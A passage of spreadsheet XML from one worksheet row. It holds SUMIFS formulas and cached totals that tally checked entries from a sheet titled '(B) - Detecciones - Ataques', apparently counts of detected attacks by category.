        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>777</v>
      </c>
      <c r="V71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>124</v>
      </c>
      <c r="W71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>42</v>
      </c>
      <c r="X71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>13</v>
      </c>
      <c r="Y71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>826</v>
      </c>
      <c r="Z71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>5033410</v>
      </c>
      <c r="AA71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>576</v>
      </c>
      <c r="AB71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>326</v>
      </c>
      <c r="AC71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>139</v>
      </c>
      <c r="AD71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>42</v>
      </c>
      <c r="AE71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>93</v>
      </c>
      <c r="AF71" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>1448</v>
      </c>
      <c r="AG71" s="271"/>
      <c r="AH71" s="352" t="s">
        <v>2538</v>
      </c>
      <c r="AI71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>55</v>
      </c>
      <c r="AJ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>20</v>
      </c>
      <c r="AL71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>497</v>
      </c>
      <c r="AR71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>251</v>
      </c>
      <c r="AS71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>4</v>
      </c>
      <c r="AU71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>15</v>
      </c>
      <c r="AV71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>10</v>
      </c>
      <c r="AW71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>72</v>
      </c>
      <c r="AY71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>10</v>
      </c>
      <c r="BA71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>42</v>
      </c>
      <c r="BB71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>2</v>
      </c>
      <c r="BF71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>9</v>
      </c>
      <c r="BG71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>2</v>
      </c>
      <c r="BJ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>3</v>
      </c>
      <c r="BK71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>27</v>
      </c>
      <c r="BL71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>2</v>
      </c>
      <c r="BM71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3620678</v>
      </c>
      <c r="BN71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>1412730</v>
      </c>
      <c r="BO71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>210</v>
      </c>
      <c r="BR71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>15</v>
      </c>
      <c r="BT71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>3</v>
      </c>
      <c r="BU71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>10</v>
      </c>
      <c r="BX71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>43</v>
      </c>
      <c r="BZ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>266</v>
      </c>
      <c r="CA71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>4</v>
      </c>
      <c r="CC71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>9</v>
      </c>
      <c r="CG71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>12</v>
      </c>
      <c r="CI71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>35</v>
      </c>
      <c r="CJ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>26</v>
      </c>
      <c r="CL71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>180</v>
      </c>
      <c r="CN71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>21</v>
      </c>
      <c r="CP71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>108</v>
      </c>
      <c r="CQ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>10</v>
      </c>
      <c r="CR71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>5</v>
      </c>
      <c r="CU71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>7</v>
      </c>
      <c r="CW71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>30</v>
      </c>
      <c r="CY71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>67</v>
      </c>
      <c r="CZ71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>19</v>
      </c>
      <c r="DF71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>1387</v>
      </c>
      <c r="DI71" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ71" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>19</v>
      </c>
      <c r="DK71" s="271"/>
      <c r="DO71" s="279"/>
      <c r="DP71" s="271"/>
      <c r="DQ71" s="271"/>
      <c r="DR71" s="271"/>
      <c r="DS71" s="271"/>
      <c r="DT71" s="271"/>
      <c r="DU71" s="271"/>
      <c r="DV71" s="271"/>
      <c r="DW71" s="271"/>
      <c r="DX71" s="271"/>
      <c r="DY71" s="271"/>
      <c r="DZ71" s="271"/>
      <c r="EA71" s="271"/>
      <c r="EB71" s="271"/>
      <c r="EC71" s="271"/>
      <c r="ED71" s="280"/>
      <c r="EG71" s="279"/>
      <c r="EH71" s="271"/>
      <c r="EI71" s="271"/>
      <c r="EJ71" s="271"/>
      <c r="EK71" s="271"/>
      <c r="EL71" s="271"/>
      <c r="EM71" s="271"/>
      <c r="EN71" s="271"/>
      <c r="EO71" s="271"/>
      <c r="EP71" s="271"/>
      <c r="EQ71" s="478"/>
      <c r="ER71" s="478"/>
      <c r="ES71" s="271"/>
      <c r="ET71" s="271"/>
      <c r="EU71" s="271"/>
      <c r="EV71" s="271"/>
      <c r="EW71" s="271"/>
      <c r="EX71" s="271"/>
      <c r="EY71" s="271"/>
      <c r="EZ71" s="271"/>
      <c r="FA71" s="280"/>
      <c r="FD71" s="480"/>
      <c r="FE71" s="480"/>
      <c r="FF71" s="480"/>
      <c r="FG71" s="480"/>
      <c r="FH71" s="480"/>
      <c r="FI71" s="480"/>
      <c r="FJ71" s="480"/>
      <c r="FK71" s="480"/>
      <c r="FL71" s="480"/>
      <c r="FM71" s="480"/>
      <c r="FN71" s="480"/>
      <c r="FO71" s="480"/>
      <c r="FP71" s="480"/>
      <c r="FQ71" s="480"/>
      <c r="FR71" s="480"/>
      <c r="FS71" s="480"/>
      <c r="FT71" s="480"/>
      <c r="FU71" s="480"/>
      <c r="FV71" s="480"/>
      <c r="FW71" s="480"/>
      <c r="FX71" s="480"/>
      <c r="FY71" s="379" t="s">
        <v>427</v>
      </c>
      <c r="FZ71" s="454">
